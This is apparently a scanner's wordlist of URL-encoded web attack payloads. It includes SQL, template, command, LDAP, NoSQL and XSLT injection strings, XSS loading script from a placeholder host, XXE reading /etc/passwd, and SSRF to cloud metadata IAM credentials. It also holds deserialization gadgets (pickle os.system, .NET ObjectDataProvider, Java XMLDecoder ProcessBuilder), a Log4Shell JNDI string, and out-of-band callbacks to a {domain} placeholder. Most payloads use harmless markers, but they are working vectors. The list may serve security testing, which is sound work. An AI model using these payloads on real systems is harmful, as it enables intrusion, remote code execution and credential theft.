%27AND%201%3DCONVERT%28int%2C%40%40version%29--%2F%2A%27OR%201%3Dextractvalue%281%2Cconcat%280x7e%2Cversion%28%29%29%29--%2A%2F%22OR%20CAST%28version%28%29%20AS%20int%29--
%27UNION%20SELECT%207%2A191--%2F%2A%27UNION%20SELECT%207%2A191%2C7%2A191--%2A%2F%22UNION%20SELECT%207%2A191%2C7%2A191%2C7%2A191--
SLEEP%285%29%2F%2A%27XOR%28IF%281%3D1%2CSLEEP%285%29%2C0%29%29OR%27%22XOR%28IF%281%3D1%2CSLEEP%285%29%2C0%29%29OR%22%2A%2F
%27%3BEXEC%20master..xp_dirtree%20%27%5C%5C%7Bdomain%7D%5Ca%27--%2F%2A%27OR%20LOAD_FILE%28%27%5C%5C%5C%5C%7Bdomain%7D%5C%5Ca%27%29OR%27%2A%2F%22OR%28SELECT%20dblink_send_query%28%27host%3D%7Bdomain%7D%27%2C%27SELECT%201%27%29%29--
%7B%7B7%2A191%7D%7D%24%7B7%2A191%7D%3C%25%3D%207%2A191%20%25%3E%24%7B%7B7%2A191%7D%7D%23%7B7%2A191%7D%23set%28%24x%3D7%2A191%29%24x%5B%3D7%2A191%5D%40%287%2A191%29
%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C
%7B%7B__import__%28%27time%27%29.sleep%285%29%7D%7D%24%7BT%28java.lang.Thread%29.sleep%285000%29%7D%3C%25%3D%20sleep%285%29%20%25%3E%24%7B%7BT%28java.lang.Thread%29.sleep%285000%29%7D%7D
%7B%7B__import__%28%27urllib.request%27%29.request.urlopen%28%27http%3A%2F%2F%7Bdomain%7D%2Fssti%27%29%7D%7D%24%7BT%28java.net.URL%29.new%28%27http%3A%2F%2F%7Bdomain%7D%2Fssti%27%29.openStream%28%29%7D%3C%25%3D%20require%28%27net%2Fhttp%27%29%3BNet%3A%3AHTTP.get%28URI%28%27http%3A%2F%2F%7Bdomain%7D%2Fssti%27%29%29%20%25%3E
%3Bsleep%205%20%23%27%7Csleep%205%7C%22%24%28sleep%205%29%60sleep%205%60
%3Becho%20%24%28%287%2A191%29%29%20%23%27%7Cexpr%207%20%5C%2A%20191%7C%22%24%28echo%20%24%28%287%2A191%29%29%29%60expr%207%20%5C%2A%20191%60
%3Bnslookup%20%7Bdomain%7D%20%23%27%7Cnslookup%20%7Bdomain%7D%7C%22%24%28nslookup%20%7Bdomain%7D%29%60nslookup%20%7Bdomain%7D%60
7%2A191
__import__%28%27time%27%29.sleep%285%29
__import__%28%27urllib.request%27%29.request.urlopen%28%27http%3A%2F%2F%7Bdomain%7D%2Fpyeval%27%29
%27%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281337%29%3E%3C%21--
%27%22%3E%3Cscript%20src%3D%2F%2F%7Bdomain%7D%2Fx.js%3E%3C%2Fscript%3E%3Cimg%20src%3D%2F%2F%7Bdomain%7D%2Fx%20onerror%3Dalert%281337%29%3E%3C%21--
%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2F%7Bdomain%7D%2Fxxe%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E
http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F
http%3A%2F%2F%7Bdomain%7D%2Fssrf
..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
return%207%2A191
%7B%22%24gt%22%3A%22%22%2C%22%24ne%22%3A%22%22%7D
%24%7B7%2A191%7D
%7B%22__proto__%22%3A%7B%22polluted%22%3A1337%7D%7D
%250d%250aX-Injected%3A1337%250d%250a
%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s
%3C%21--%23set%20var%3D%22x%22%20value%3D%221337%22%20--%3E%3C%21--%23echo%20var%3D%22x%22%20--%3E
%2A%29%28cn%3D%2A%29%29%28%7C%28cn%3D%2A
%2A%29%28uid%3D1337%29%28%26%28objectClass%3D%2A
%3Cxsl%3Avalue-of%20select%3D%227%2A191%22%2F%3E
%3Cxsl%3Avalue-of%20select%3D%22document%28%27http%3A%2F%2F%7Bdomain%7D%2Fxslt%27%29%22%2F%3E
%3Cxsl%3Ainvalid%2F%3E
%7B%22query%22%3A%7B%22invalid_query_type%22%3A%7B%7D%7D%7D
%7B%22script_fields%22%3A%7B%22x%22%3A%7B%22script%22%3A%227%2A191%22%7D%7D%7D
%27%20OR%201%3D1%20RETURN%207%2A191%20%2F%2F
%27%20OR%201%3D1%20WITH%201%20AS%20x%20CALL%20apoc.util.sleep%285000%29%20RETURN%20x%20%2F%2F
%7B%22selector%22%3A%7B%22%24invalid_op%22%3A%22test%22%7D%7D
new%20GroovyShell%28%29.evaluate%28%277%2A191%27%29
Thread.sleep%285000%29
new%20URL%28%27http%3A%2F%2F%7Bdomain%7D%2Fgroovy%27%29.text
Y19fYnVpbHRpbl9fCmV2YWwKKFMnMS8wJwp0Ui4%3D
Y19fYnVpbHRpbl9fCmV2YWwKKFMnNyoxOTEnCnRSLg%3D%3D
Y29zCnN5c3RlbQooUydzbGVlcCA1Jwp0Ui4%3D
Y19fYnVpbHRpbl9fCmV2YWwKKFMnX19pbXBvcnRfXygidXJsbGliLnJlcXVlc3QiKS5yZXF1ZXN0LnVybG9wZW4oImh0dHA6Ly97ZG9tYWlufS9waWNrbGUiKScKdFIu
%21%21python%2Fobject%2Fapply%3Abuiltins.eval%20%5B%221%2F0%22%5D
%21%21python%2Fobject%2Fapply%3Abuiltins.eval%20%5B%227%2A191%22%5D
%21%21python%2Fobject%2Fapply%3Aos.system%20%5B%22sleep%205%22%5D
%21%21python%2Fobject%2Fapply%3Abuiltins.exec%20%5B%22import%20urllib.request%3Burllib.request.urlopen%28%27http%3A%2F%2F%7Bdomain%7D%2Fyaml%27%29%22%5D
%7B%22py%2Freduce%22%3A%5B%7B%22py%2Ffunction%22%3A%22builtins.eval%22%7D%2C%7B%22py%2Ftuple%22%3A%5B%221%2F0%22%5D%7D%5D%7D
%7B%22py%2Freduce%22%3A%5B%7B%22py%2Ffunction%22%3A%22builtins.eval%22%7D%2C%7B%22py%2Ftuple%22%3A%5B%227%2A191%22%5D%7D%5D%7D
%7B%22py%2Freduce%22%3A%5B%7B%22py%2Ffunction%22%3A%22time.sleep%22%7D%2C%7B%22py%2Ftuple%22%3A%5B5%5D%7D%5D%7D
%7B%22py%2Freduce%22%3A%5B%7B%22py%2Ffunction%22%3A%22builtins.eval%22%7D%2C%7B%22py%2Ftuple%22%3A%5B%22__import__%28%27urllib.request%27%29.request.urlopen%28%27http%3A%2F%2F%7Bdomain%7D%2Fjsonpickle%27%29%22%5D%7D%5D%7D
%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%28%29%7Bthrow%20new%20Error%281337%29%7D%28%29%22%7D
%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%28%29%7Breturn%207%2A191%7D%28%29%22%7D
%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%28%29%7Brequire%28%27child_process%27%29.execSync%28%27sleep%205%27%29%7D%28%29%22%7D
%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%28%29%7Brequire%28%27http%27%29.get%28%27http%3A%2F%2F%7Bdomain%7D%2Fnodeser%27%29%7D%28%29%22%7D
%21%21invalid_tag_probe%201337
%7B%22__js%22%3A%22throw%20new%20Error%281337%29%22%7D
O%3A9999%3A%22NonExist%22%3A0%3A%7B%7D
---%20%21ruby%2Fobject%3ANonExistentClass1337%5Cni%3A%20x
BAj%2FAAAA
cHN0MP%2F%2F%2FwQA
---%20%7B%7B%7Binvalid%20yaml%201337
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldA%3D%3D
%21%21com.nonexistent.FakeClass1337%20%7B%7D
%5B%22com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl%22%2C%7B%22transletBytecodes%22%3A%5B%22yv66vg%3D%3D%22%5D%2C%22transletName%22%3A%22a%22%2C%22outputProperties%22%3A%7B%7D%7D%5D
%7B%22%40type%22%3A%22com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl%22%2C%22_bytecodes%22%3A%5B%22yv66vg%3D%3D%22%5D%2C%22_name%22%3A%22a%22%2C%22_tfactory%22%3A%7B%7D%2C%22_outputProperties%22%3A%7B%7D%7D
%7B%22%40type%22%3A%22java.net.InetAddress%22%2C%22val%22%3A%22%7Bdomain%7D%22%7D
%3Cjava.lang.ProcessBuilder%3E%3Ccommand%3E%3Cstring%3Enslookup%3C%2Fstring%3E%3Cstring%3E%7Bdomain%7D%3C%2Fstring%3E%3C%2Fcommand%3E%3C%2Fjava.lang.ProcessBuilder%3E
%3Cjava%20version%3D%221.8.0%22%20class%3D%22java.beans.XMLDecoder%22%3E%3Cobject%20class%3D%22com.nonexistent.Fake1337%22%2F%3E%3C%2Fjava%3E
%3Cjava%20version%3D%221.8.0%22%20class%3D%22java.beans.XMLDecoder%22%3E%3Cobject%20class%3D%22java.lang.ProcessBuilder%22%3E%3Carray%20class%3D%22java.lang.String%22%20length%3D%223%22%3E%3Cvoid%20index%3D%220%22%3E%3Cstring%3E%2Fbin%2Fsh%3C%2Fstring%3E%3C%2Fvoid%3E%3Cvoid%20index%3D%221%22%3E%3Cstring%3E-c%3C%2Fstring%3E%3C%2Fvoid%3E%3Cvoid%20index%3D%222%22%3E%3Cstring%3Eecho%201337%3C%2Fstring%3E%3C%2Fvoid%3E%3C%2Farray%3E%3Cvoid%20method%3D%22start%22%2F%3E%3C%2Fobject%3E%3C%2Fjava%3E
%3Cjava%20version%3D%221.8.0%22%20class%3D%22java.beans.XMLDecoder%22%3E%3Cobject%20class%3D%22java.lang.Thread%22%20method%3D%22sleep%22%3E%3Clong%3E5000%3C%2Flong%3E%3C%2Fobject%3E%3C%2Fjava%3E
%3Cjava%20version%3D%221.8.0%22%20class%3D%22java.beans.XMLDecoder%22%3E%3Cobject%20class%3D%22java.net.URL%22%3E%3Cstring%3Ehttp%3A%2F%2F%7Bdomain%7D%2Fxmldecoder%3C%2Fstring%3E%3Cvoid%20method%3D%22openStream%22%2F%3E%3C%2Fobject%3E%3C%2Fjava%3E
C_hessianRldap%3A%2F%2F%7Bdomain%7D%2Fa
%7B%22%24type%22%3A%22System.Windows.Data.ObjectDataProvider%2C%20PresentationFramework%22%2C%22MethodName%22%3A%22Start%22%2C%22ObjectInstance%22%3A%7B%22%24type%22%3A%22System.Diagnostics.Process%2C%20System%22%2C%22StartInfo%22%3A%7B%22%24type%22%3A%22System.Diagnostics.ProcessStartInfo%2C%20System%22%2C%22FileName%22%3A%22nslookup%22%2C%22Arguments%22%3A%22%7Bdomain%7D%22%7D%7D%7D
%7B%22%24type%22%3A%22System.Windows.Data.ObjectDataProvider%2C%20PresentationFramework%22%2C%22MethodName%22%3A%22Start%22%2C%22ObjectInstance%22%3A%7B%22%24type%22%3A%22System.Diagnostics.Process%2C%20System%22%2C%22StartInfo%22%3A%7B%22%24type%22%3A%22System.Diagnostics.ProcessStartInfo%2C%20System%22%2C%22FileName%22%3A%22cmd%22%2C%22Arguments%22%3A%22%2Fc%20echo%201337%22%7D%7D%7D
%7B%22%24type%22%3A%22System.Windows.Data.ObjectDataProvider%2C%20PresentationFramework%22%2C%22MethodName%22%3A%22Start%22%2C%22ObjectInstance%22%3A%7B%22%24type%22%3A%22System.Diagnostics.Process%2C%20System%22%2C%22StartInfo%22%3A%7B%22%24type%22%3A%22System.Diagnostics.ProcessStartInfo%2C%20System%22%2C%22FileName%22%3A%22cmd%22%2C%22Arguments%22%3A%22%2Fc%20timeout%205%22%7D%7D%7D
AAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAEAQAAAA%3D%3D
__VIEWSTATE%3D%2FwEPDwUKLTEyMzQ1Njc4OQ%3D%3D
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHA%2FQAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxldAASTGphdmEvbGFuZy9TdHJpbmc7TAAEaG9zdHQAEkxqYXZhL2xhbmcvU3RyaW5nO0wACHByb3RvY29sdAASTGphdmEvbGFuZy9TdHJpbmc7TAADcmVmdAASTGphdmEvbGFuZy9TdHJpbmc7cP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FdAAIe2RvbWFpbn10AAcvdXJsZG5zdAAIe2RvbWFpbn10AARodHRwcHh0ABZodHRwOi8ve2RvbWFpbn0vdXJsZG5zeA%3D%3D
%24%7Bjndi%3Aldap%3A%2F%2F%7Bdomain%7D%2Fa%7D
